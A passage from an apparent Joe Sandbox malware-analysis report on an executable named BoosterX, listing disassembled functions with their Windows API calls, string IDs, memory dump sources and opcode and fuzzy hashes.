                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                    • API String ID: 2102711378-639343689
                                                    • Opcode ID: 89b40b535af03a040ab3a03455bd0731328f990642d65d4a1277120577c57159
                                                    • Instruction ID: 0617e8f7631dd809c73dfadeef1ca01ee2c0248b4634fa4a33641cbed9f7efd1
                                                    • Opcode Fuzzy Hash: 89b40b535af03a040ab3a03455bd0731328f990642d65d4a1277120577c57159
                                                    • Instruction Fuzzy Hash: F351AB66F18A43A5FA219F65D8412BD33A1AF857AAF040131DE9DD77E6DF3CE486C200
                                                    Function 00007FF6C0377AA8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Rect
                                                    • String ID: RarHtmlClassName
                                                    • API String ID: 2396740005-1658105358
                                                    • Opcode ID: e61806d4995b6197c20590cc1e84a9d2430e7e9d2d5b3509b02ee98fded6cc23
                                                    • Instruction ID: 7f88b35553fd2a0302e4af44d54afeeacca7a7612d7775f45d8628becfc0bddc
                                                    • Opcode Fuzzy Hash: e61806d4995b6197c20590cc1e84a9d2430e7e9d2d5b3509b02ee98fded6cc23
                                                    • Instruction Fuzzy Hash: 35519522A09B839AEB249F29E55437A63A0FF89B86F104535DECEC7B55DF3CE1458700
                                                    Function 00007FF6C037FE54 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                    • API String ID: 0-56093855
                                                    • Opcode ID: fc5be3ed44ea404419216795f56c086f61d8a3e370be94283853cacc62a44369
                                                    • Instruction ID: 4fe51af4619d4fe10883f7c03f2f1753283ddfb000599a44a19c44c426084470
                                                    • Opcode Fuzzy Hash: fc5be3ed44ea404419216795f56c086f61d8a3e370be94283853cacc62a44369
                                                    • Instruction Fuzzy Hash: 5521DD64A09F8BE5FA108F19A94817823A0FF89B8AF14143AD9CDD7361DF3CE285C344
                                                    Function 00007FF6C038BF30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: f98038199561589234cc2a21183cce8921094221fb9f21f9ab19275f87f72e7e
                                                    • Instruction ID: 85beed3094e8419b966913e9f48a9e1aa9637ca189d9298bcb2e8ebfc80f7750
                                                    • Opcode Fuzzy Hash: f98038199561589234cc2a21183cce8921094221fb9f21f9ab19275f87f72e7e
                                                    • Instruction Fuzzy Hash: DEF0FF65A29A43A1EE548F11E8542796360EFC8792F485136EE8FC6764DF3CD585CB00
                                                    Function 00007FF6C0394540 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: c065245cb44755ae58ebfe43422878115c1e571edfc284914e4b515b233c21cc
                                                    • Instruction ID: c7768c627e19d0185bcb75e907db2479154b085627fd49c1f0353cbaf2ee7f2d
                                                    • Opcode Fuzzy Hash: c065245cb44755ae58ebfe43422878115c1e571edfc284914e4b515b233c21cc
                                                    • Instruction Fuzzy Hash: 3B810362F18653A9FB209F659880ABD27A0BB45B8AF004236DE8EC77D5DF3CE445C710
                                                    Function 00007FF6C0363AB8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2398171386-0
                                                    • Opcode ID: 576e37249fc770885bef1ed8c76ec8c626bec9fe2c5606531df86f5f014861ad
                                                    • Instruction ID: e499e668b7af905e058b78946674f58f695fff9c2930099f9d177608cf2228d1
                                                    • Opcode Fuzzy Hash: 576e37249fc770885bef1ed8c76ec8c626bec9fe2c5606531df86f5f014861ad
                                                    • Instruction Fuzzy Hash: 7551A022F08A43A9FB548F75E4402BD23B1BB857A9F004635EE9DDB7D9EF3891598340
                                                    Function 00007FF6C0393EB4 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 3659116390-0
                                                    • Opcode ID: c3abc48754519be15551293a6e0649ae656e409aee0bb9161411e3edb71b8ba7
                                                    • Instruction ID: bf82ada75383ed05b2479c398cbdcf3d8b8f7f3acfeefb80b5df06fd9b09a7ab
                                                    • Opcode Fuzzy Hash: c3abc48754519be15551293a6e0649ae656e409aee0bb9161411e3edb71b8ba7
                                                    • Instruction Fuzzy Hash: 66518B72A18A5299E710CF65E4447AC7BB0BB44B99F088236DF8EC7B98DF38D546C700
                                                    Function 00007FF6C0381D80 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocString
                                                    • String ID:
                                                    • API String ID: 262959230-0
                                                    • Opcode ID: 232b551fadca1ae103d473e2eb18b0591082179b1a5a78a8c3b0890ea4ad4e1c
                                                    • Instruction ID: 8cef893338143e1f3631acf4a4dde1b9b7a2cb14672666d0eba096c29d93cb87
                                                    • Opcode Fuzzy Hash: 232b551fadca1ae103d473e2eb18b0591082179b1a5a78a8c3b0890ea4ad4e1c
                                                    • Instruction Fuzzy Hash: 2A419022A09A47A9EB149F6194003B92294FF44FA6F144B77EEADC77D5DF3CE1818300
                                                    Function 00007FF6C038F394 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    • Opcode ID: 58013ddfa1b8f2a6b284722f37e6c4f9e5d0fe59be829cfb9bb44955ab89945c
                                                    • Instruction ID: 7278a966974de2b167bc0437ab62134a6b4eae48d61b6b789dc6057e2b4d2f94
                                                    • Opcode Fuzzy Hash: 58013ddfa1b8f2a6b284722f37e6c4f9e5d0fe59be829cfb9bb44955ab89945c
                                                    • Instruction Fuzzy Hash: 7841E222B09A53A6FE159F67AC006B66295BF44BA1F194637DD9ECB794EF3CE4408300
                                                    Function 00007FF6C0395658 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                    • Instruction ID: cd47a5f1d94137ee8ec2ea694555ac0bc826990f3480351e9fa1462b9a515cbb
                                                    • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                    • Instruction Fuzzy Hash: 9D11C636E5CA0325F6541D28E4823B911416F553B3FD95634EAEEC77D6CF2CA4C44321
                                                    Function 00007FF6C037FDA4 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                    • String ID:
                                                    • API String ID: 3621893840-0
                                                    • Opcode ID: 778d1433a15cb232463e835737ecf941f1ea11e5feb15a2f4f0cdc38d0c17baa
                                                    • Instruction ID: 2b37f25f723ceaad709764c1872a024314573991d7774711081b0254f01d1655
                                                    • Opcode Fuzzy Hash: 778d1433a15cb232463e835737ecf941f1ea11e5feb15a2f4f0cdc38d0c17baa
                                                    • Instruction Fuzzy Hash: 5DF04F21B38857A2F7608F28E895E762251FFE4706F545030EA8FC1A949F3CD149C700
                                                    Function 00007FF6C03861DC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: __except_validate_context_recordabort
                                                    • String ID: csm$csm
                                                    • API String ID: 746414643-3733052814
                                                    • Opcode ID: 45511b213c9a374d7ceaaf4858a5ad53e2acac7686b2eca8251f0658937cf8b7
                                                    • Instruction ID: 39ffb15ae2e55c7b53f66660684b93a9d02c2d31522f830264daa922bb82c4c4
                                                    • Opcode Fuzzy Hash: 45511b213c9a374d7ceaaf4858a5ad53e2acac7686b2eca8251f0658937cf8b7
                                                    • Instruction Fuzzy Hash: B571A0726086929ADB608F26905477D7BA5EB41B8AF0482B7DECCC7B89CF3CD591C701
                                                    Function 00007FF6C0388074 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: $*
                                                    • API String ID: 3215553584-3982473090
                                                    • Opcode ID: 9f157a4f6751954bae8bab9751d51363cef21cdc707d610504346d4c75dafc04
                                                    • Instruction ID: e4de98d464e22e8fb56e428d2aa781636e9609cd179eefa9ae72d26757a6e1af
                                                    • Opcode Fuzzy Hash: 9f157a4f6751954bae8bab9751d51363cef21cdc707d610504346d4c75dafc04
                                                    • Instruction Fuzzy Hash: 0451507290C647AAE7658F34904937C3BA1EB55B0AF1417B7CECEC2399CF28E586C605
                                                    Function 00007FF6C03916D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$StringType
                                                    • String ID: $%s
                                                    • API String ID: 3586891840-3791308623
                                                    • Opcode ID: e5e9050dfdaeb3c12b157b48f2e5ef5602bf6f551ba74a9a670d22b2743eb576
                                                    • Instruction ID: be372b6664e56bf8aaf6bbc8e82d8d4627e85c11816032940ccdd7f5f8980f62
                                                    • Opcode Fuzzy Hash: e5e9050dfdaeb3c12b157b48f2e5ef5602bf6f551ba74a9a670d22b2743eb576
                                                    • Instruction Fuzzy Hash: E8419F22B18B83AAEB608F65D8006A92391FB45BA9F480636DE9DD77D5DF3CE4418300
                                                    Function 00007FF6C0386620 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                    • String ID: csm
                                                    • API String ID: 2466640111-1018135373
                                                    • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                    • Instruction ID: 3cccebfb8b8387d7e657a50c21df6f9a4550e985fb11cbf73bd8ff002013cf29
                                                    • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                    • Instruction Fuzzy Hash: 97518E7261874296DA20AF25E44426E77E4FB88B96F400677EBCDC7B55DF38E050CB00
                                                    Function 00007FF6C03942E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                    • String ID: U
                                                    • API String ID: 2456169464-4171548499
                                                    • Opcode ID: d45e585e69c0243794f741c6b44cd1cf0a8545c3e68d7014f3b50cee5fd1175b
                                                    • Instruction ID: 026ab394987b51ee6bc0803fbd8227caa152a7fd8366991a00337137ad841d9b
                                                    • Opcode Fuzzy Hash: d45e585e69c0243794f741c6b44cd1cf0a8545c3e68d7014f3b50cee5fd1175b
                                                    • Instruction Fuzzy Hash: 5E41D322B18A82A6EB20CF25E8447BA77A0FB88795F444131EE8DC7798DF7CD451CB40
                                                    Function 00007FF6C0379030 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ObjectRelease
                                                    • String ID:
                                                    • API String ID: 1429681911-3916222277
                                                    • Opcode ID: 9b4f6076e1c5c019ef354d78af0e0b1b4430159407e758763c369daf3f7713af
                                                    • Instruction ID: 260a4936808f349ed56e11e4c0eabd54a014f3a2c9fadb10bbfe2b5cfab14623
                                                    • Opcode Fuzzy Hash: 9b4f6076e1c5c019ef354d78af0e0b1b4430159407e758763c369daf3f7713af
                                                    • Instruction Fuzzy Hash: 6E313A35608B5296EA04AF17B81862AB7A0F789FD6F504435ED8F83B94CF3CE449CB00
                                                    Function 00007FF6C036E7EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(?,?,?,00007FF6C03730FF,?,?,00001000,00007FF6C035E52D), ref: 00007FF6C036E837
                                                    • CreateSemaphoreW.KERNEL32(?,?,?,00007FF6C03730FF,?,?,00001000,00007FF6C035E52D), ref: 00007FF6C036E847
                                                    • CreateEventW.KERNEL32(?,?,?,00007FF6C03730FF,?,?,00001000,00007FF6C035E52D), ref: 00007FF6C036E860
                                                    Strings
                                                    Memory Dump Source
